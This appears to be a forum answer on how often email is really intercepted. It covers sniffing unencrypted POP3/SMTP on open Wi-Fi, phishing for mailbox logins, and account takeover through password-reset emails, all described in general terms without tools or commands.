Does anyone have real-life examples of e-mail being intercepted?
I personally have witnessed live, in-transit, email interception. It was at a technical conference and the session was all about sniffing networks. The instructor just fired her sniffer up on the conference wireless network and within 15 minutes had several POP3/SMTP authentication pairs complete with the retrieved and sent messages. These were laptops out in the conference halls polling their email over unencrypted protocols. Then in the 15-30 minutes after the session the session attendees were doing the same thing once they downloaded the right tools.
I would be very, very surprised if the same kinds of things are not ever done on our Campus WLAN.
As a side note, the instructor also admitted to sniffing her cable-neighbor's traffic. For educational purposes only.
In terms of SMTP processing email is vastly more likely to be intercepted close to the end points. The interested parties are on either end of that conversation. In the middle where the SMTP traffic is flowing over the greater Internet, the interested party is much more likely to be a government than evil hackers.
That said, the biggest interception cases are not grabbing the SMTP transaction in flight, it's grabbing the POP3/IMAP/SMTP/WebMail login which ensures complete interception ability in perpetuity (or at least until the password is changed). This is attempted daily on my network via Phishing. Once credentials are leaked email can be read willy nilly, or more commonly used to send spam by way of our trusted email servers.
To answer your questions, though,
1: Yes, this is a real problem. The biggest exposure is over untrusted (or trusted but unencrypted) wireless networks. And governments.
2: They're out there, but I'd have to google and I'm lazy this Saturday morning. Intercepting actual SMTP transactions not at the endpoint is generally the purview of Governments and corporate security. Hackers generally target mailboxes not the transactions, as they're a much richer target.
3: Sniffing wireless networks for unencrypted email transactions is by FAR the easiest method. Think coffee-shop type setups. Lesser methods like suborning mail servers to grab messages are more theoretical than actual, though much more harmful when they do occur.
Stepping back one step to the topic of password reset emails, hackers who have compromised a mailbox can leverage such emails to compromise other sites. They compromise a gmail account and by looking at messages realize that this person does a lot of business with a certain ecommerce site known to store credit-card information. They go to that site and go through the forgotten-password process (since a LOT of sites now use the email address as the account-name these days) and get the password reset email. They reset the password, which starts the timer on when the account-owner will notice. Evil commences, especially if the ecommerce site is one that displays whole credit-card numbers in the profile.
The sad thing here is that it is entirely possible that the account-owner won't even see the inability to log in as a certain sign that evil has occurred. If they're not using a password-remembering program they could just chalk it up to creeping old age and just reset the password to one they know.